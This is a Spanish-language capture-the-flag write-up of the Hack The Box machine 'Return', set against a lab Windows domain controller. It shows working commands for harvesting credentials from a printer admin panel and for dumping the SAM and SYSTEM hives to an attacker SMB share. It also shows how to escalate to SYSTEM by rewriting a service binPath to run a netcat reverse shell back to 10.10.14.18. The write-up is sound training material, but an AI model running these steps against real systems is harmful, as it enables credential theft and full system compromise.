Máquina Return Hack the Box
Lo primero que realizamos es una enumeración de todos los servicios para ver a que nos estamos enfrentando
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nmap -sS -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49694,52463 -oN nmap 10.10.11.108
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-19 20:26 -05
Nmap scan report for 10.10.11.108
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-20 01:45:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
52463/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 18m36s
| smb2-time:
| date: 2022-05-20T01:46:19
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.55 seconds
Lo primero que vamos a revisar es el puerto 80 ya que cuenta con un servicio http
Explorando la página vemos que en Settings tiene un servicio con un server address, un puerto, un usuario y una contraseña
Pero al tratar de ver la contraseña en el código fuente, nos dice que está en texto plano
Investigando un poco dimos con un articulo de securicon, donde nos dice una forma de obtener credenciales de usuario, cuando se tiene acceso a Interfaz web
Nos dice que podemos tener el netcat a la escucha para optener las credenciales
Así que ponemos nuestro netcat a la escucha en el puerto 389, como nos muestra la interfaz gráfica
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 389
listening on [any] 389 ...
Modificamos el Server Address por nuestra ip y le damos en Update
Una vez le damos Update nos llega una credencial
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.108] 58509
0*`%return\svc-printer�
1edFg43012!!^C
con la herramienta crackmapexec vemos que es una credencial valida para el usuario
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
WINRM 10.10.11.108 5985 PRINTER [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.10.11.108 5985 PRINTER [*] http://10.10.11.108:5985/wsman
WINRM 10.10.11.108 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
Así que vamos a iniciar sesión con la herramienta evil-winrm y de esta manera tenemos la primera flag de usuario
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/19/2022 7:56 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
08976a********************4cf015
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>
Vemo que podemos ingresar al directorio del Administrador, pero no podemos leer la flag
*Evil-WinRM* PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/20/2021 12:10 PM 3D Objects
d-r--- 5/20/2021 12:10 PM Contacts
d-r--- 9/27/2021 4:22 AM Desktop
d-r--- 5/27/2021 12:50 AM Documents
d-r--- 5/26/2021 3:00 AM Downloads
d-r--- 5/20/2021 12:10 PM Favorites
d-r--- 5/20/2021 12:10 PM Links
d-r--- 5/20/2021 12:10 PM Music
d-r--- 5/20/2021 12:10 PM Pictures
d-r--- 5/20/2021 12:10 PM Saved Games
d-r--- 5/20/2021 12:10 PM Searches
d-r--- 5/20/2021 12:10 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/19/2022 7:56 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Nos vamos a un directorio como Documents para subir el winPeas y ejecutarlo para ver que información nos muestra
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /mnt/angussMoody/Scripts/Windows/winPEASx64.exe .
Info: Uploading /mnt/angussMoody/Scripts/Windows/winPEASx64.exe to .
Data: 2581844 bytes of 2581844 bytes copied
Info: Upload successful!
Ejecutamos la herramienta
*Evil-WinRM* PS C:\Users\svc-printer\Documents> .\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########.((((((((((((
(((((((((((/********************/#######.((((((((((
(((((((.******************/@@@@@/****######.(((((((((
(((((.********************@@@@@@@@@@/***,####.(((((((((
((((.********************/@@@@@%@@@@/********##(((((((((
.((############*********/%@@@@@@@@@/************.(((((((
.(##################(/******/@@@@@/***************.(((((
.(#########################(/**********************.((((
.(##############################(/*****************.((((
.(###################################(/************.((((
.(#######################################(*********.((((
.(#######(,.***.,(###################(..***.*******.((((
.(#######*(#####((##################((######/(*****.((((
.(###################(/***********(##############().((((
.((#####################/*******(################)((((((
.(((############################################).(((((
..(((##########################################).((((((
....((########################################).((((((
......((####################################).(((((((
(((((((((#################################).((((((((
(((((((((/##########################).((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
WinPEASng by @carlospolopm, makikvues(makikvues2[at]gmail[dot]com)
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Get latest WinPEAS : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd c:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/20/2021 7:19 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 9/27/2021 4:46 AM Program Files
d----- 5/26/2021 2:57 AM Program Files (x86)
d-r--- 5/26/2021 1:51 AM Users
d----- 9/27/2021 4:49 AM Windows
*Evil-WinRM* PS C:\> mkdir Temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/19/2022 9:18 PM Temp
c*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> dir
*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2022 9:19 PM 49152 sam
-a---- 5/19/2022 9:19 PM 15925248 system
*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading sam to ./sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading system to ./system
Info: Download successful!
Dentro de toda la información que nos devuelve vemos que tenemos varios permisos con este usuario, entre ellos
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Navegando un poco nos encontramos con este articulo de hackingarticles donde nos dice que con este privilegio podemos copiar archivos y que podemos copir el archivo sam y system para luego dumpearlo en nuestra máquina atacante
Realizamos los pasos que nos dice el articulo y vemos que ya tenemos estos archivos en nuestro directorio
*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2022 9:54 PM 49152 sam
-a---- 5/19/2022 9:54 PM 16023552 system
*Evil-WinRM* PS C:\Temp>
Ahora vamos a pasar a descarlos, intenté con download directo, pero no me los descarga, así que vamos a realizarlo con smbsever de impacket
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2022 9:54 PM 49152 sam
-a---- 5/19/2022 9:54 PM 16023552 system
*Evil-WinRM* PS C:\Temp> clear
*Evil-WinRM* PS C:\Temp> copy sam \\10.10.14.4\Folder\sam
*Evil-WinRM* PS C:\Temp> copy system \\10.10.14.4\Folder\system
*Evil-WinRM* PS C:\Temp>
-----------------------------------------------------------------------------------------------------------------------------------------------
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #impacket-smbserver Folder . -smb2support
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.108,49423)
[*] AUTHENTICATE_MESSAGE (\,PRINTER)
[*] User PRINTER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:Folder)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:Folder)
[*] Closing down connection (10.10.11.108,49423)
[*] Remaining connections []
Ya tenemos estos archivos en nuestra máquina
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #ll sam system
Permissions Size User Date Modified Name
.rwxrwxrwx 49k angussmoody 19 may 23:54 sam
.rwxrwxrwx 16M angussmoody 19 may 23:54 system
ahora vamos a dumpearlo con la herramienta samdump2
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #samdump2 -h
samdump2 3.0.0 by Objectif Securite (http://www.objectif-securite.ch)
original author: ncuomo@studenti.unina.it
Usage: samdump2 [OPTION]... SYSTEM_FILE SAM_FILE
Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM
-d enable debugging
-h display this information
-o file write output to file
y esta nos entrega los hash de los usuarios
┌─[✗]─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #samdump2 -d system sam
Root Key : ROOT
Default ControlSet: 001
********* ROOT\ControlSet001\Control\Lsa\JD *********
n->classname_len = 16 b = ed616c
********* ROOT\ControlSet001\Control\Lsa\Skew1 *********
n->classname_len = 16 b = ed66cc
********* ROOT\ControlSet001\Control\Lsa\GBG *********
n->classname_len = 16 b = ed5fdc
********* ROOT\ControlSet001\Control\Lsa\Data *********
n->classname_len = 16 b = ed5e34
Bootkey unsorted: cdf62c6714d022899a69dba4c34e35c8
Root Key : ROOT
******************** 1 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F4
disabled = 0
username len=13, off=1c0
lm_hashoffset = 250, lm_size = 18
nt_hashoffset = 268, nt_size = 38
******************** 2 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F5
disabled = 1
username len=5, off=1b4
lm_hashoffset = 238, lm_size = 18
nt_hashoffset = 250, nt_size = 18
******************** 3 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F7
disabled = 1
username len=14, off=d8
lm_hashoffset = 248, lm_size = 18
nt_hashoffset = 260, nt_size = 18
******************** 4 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F8
disabled = 1
username len=18, off=d0
lm_hashoffset = 1fc, lm_size = 0
nt_hashoffset = 1fc, nt_size = 0
******************** -1 ********************
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* ä:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Pero al tratar de conectarnos con evil-winrm nos da un error
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #evil-winrm -i 10.10.11.108 -u Administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
con wmiexec nos da error también
┌─[✗]─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #wmiexec.py return.local/Administrator@10.10.11.108 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
Al igual con psexec
┌─[✗]─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -target-ip 10.10.11.108 administrator@10.10.11.108
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
seguimos realizando una enumeración y con el comando whoami /all vimos a los grupos que pertenecemos, también podemos verlo con el comando whoami /groups y vemos que pertenecemos al grupo Print Operators y Server Operators
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Revisando estos grupos en este artículo **Server Operators nos dice que podemos: iniciar sesión en un servidor de forma interactiva, crear y eliminar recursos compartidos de red, iniciar y detener servicios, realizar copias de seguridad y restaurar archivos, formatear la unidad de disco duro de la computadora y apagar la computadora.
con la herramienta sc.exe podemos crear un servicio o modificar uno que esté corriendo en el sistema, vamos a intentar crearnos un servicio que nos cargue el nc.exe para tener una reverse shell en nuestra máquina, pasamos al directorio Temp donde tenemos todos los permisos y subirmos el nc.exe poner el path de nuestro servicio
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd c:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> upload /mnt/angussMoody/Scripts/Windows/nc64.exe
Info: Uploading /mnt/angussMoody/Scripts/Windows/nc64.exe to C:\Windows\Temp\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Windows\Temp>
al listar lo que tenemos en el directorio vemos muchas cosas de vmware y nuestro nc64.exe
*Evil-WinRM* PS C:\Windows\Temp> dir
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/8/2022 4:25 PM DiagTrack_alternativeTrace
d----- 8/8/2022 4:25 PM DiagTrack_aot
d----- 8/8/2022 4:25 PM DiagTrack_diag
d----- 8/8/2022 4:25 PM DiagTrack_miniTrace
d----- 9/27/2021 6:04 AM vmware-SYSTEM
-a---- 8/8/2022 6:27 PM 45272 nc64.exe
-a---- 8/8/2022 4:26 PM 102 silconfig.log
-a---- 9/27/2021 5:59 AM 206 temBC3F.tmp
-a---- 9/27/2021 6:14 AM 13692 vmware-vmsvc-SYSTEM.log
-a---- 9/27/2021 4:46 AM 52365 vmware-vmsvc.log
-a---- 9/27/2021 6:05 AM 297 vmware-vmtoolsd-Administrator.log
-a---- 8/8/2022 4:25 PM 396 vmware-vmtoolsd-SYSTEM.log
-a---- 9/27/2021 6:14 AM 3984 vmware-vmusr-Administrator.log
-a---- 9/27/2021 4:46 AM 12982 vmware-vmusr.log
-a---- 8/8/2022 4:25 PM 288 vmware-vmvss-SYSTEM.log
-a---- 9/27/2021 4:43 AM 2016 vmware-vmvss.log
*Evil-WinRM* PS C:\Windows\Temp>
Una vez subido nuestro binario vamos a crearnos un servicio y le ponemos el path de nuestro binario, pero aunque estamos en el grupo no tenemos los permisos para crearnos un servicio.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe create shell_reverse binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenSCManager FAILED 5:
Access is denied.
Como no podemos crear un servicio, vamos a tratar de modificar uno que ya esté corriendo en el sistema como nos dice el artículo sc.exe
Lo primero que debemos hacer es ver que servicios están corriendo en nuestro sistema y vemos que tenemos varios servicios corriendo, ahora vamos tratar de modificar alguno de estos con nuestra carga maliciosa
*Evil-WinRM* PS C:\Windows\Temp> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc
*Evil-WinRM* PS C:\Windows\Temp>
Despues de intentar con varios servicios vemos que podemos realizar la modificación con el servicio VWTools
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config WMPNetworkSvc binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenService FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config WinDefend binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenService FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config WdNisSvc binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenService FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config VMTools binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] ChangeServiceConfig SUCCESS
Ahora lo que debemos realizar es un reinicio del servicio, para eso debemos hacerlo con el comando strop y luego iniciarlo con el comando start, pero primero con el comando qc podemos ver si se realizó la modificación de este y vemos que en BINARY_PATH_NAME, tenemos nuestra carga maliciosa
*Evil-WinRM* PS C:\Windows\Temp> sc.exe qc VMTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VMware Tools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
*Evil-WinRM* PS C:\Windows\Temp>
Ahora vamos a detener el servicio
*Evil-WinRM* PS C:\Windows\Temp> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
y antes de iniciarlo de nuevo vamos a poner nuestra máquina a la escucha en el puerto que configuramos
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 443
Listening on 0.0.0.0 443
Una vez tenemos nuestra máquina a la escucha podemos inciar el servicio en nuestra máquina atacante, este se queda cargando
*Evil-WinRM* PS C:\Windows\Temp> sc.exe start VMTools
y en nuestra máquina atacante ya tenemos nuestra reverse shell como administrador
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.108 51060
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Ya con esta revershe shell podemos ir a la ruta del administrador y leer nuestra segunda flag
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.108 51073
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3A0C-428E
Directory of c:\Users\Administrator\Desktop
09/27/2021 04:22 AM <DIR> .
09/27/2021 04:22 AM <DIR> ..
08/08/2022 04:25 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 8,600,281,088 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
6bb6a0*******************ea4923
c:\Users\Administrator\Desktop>
a
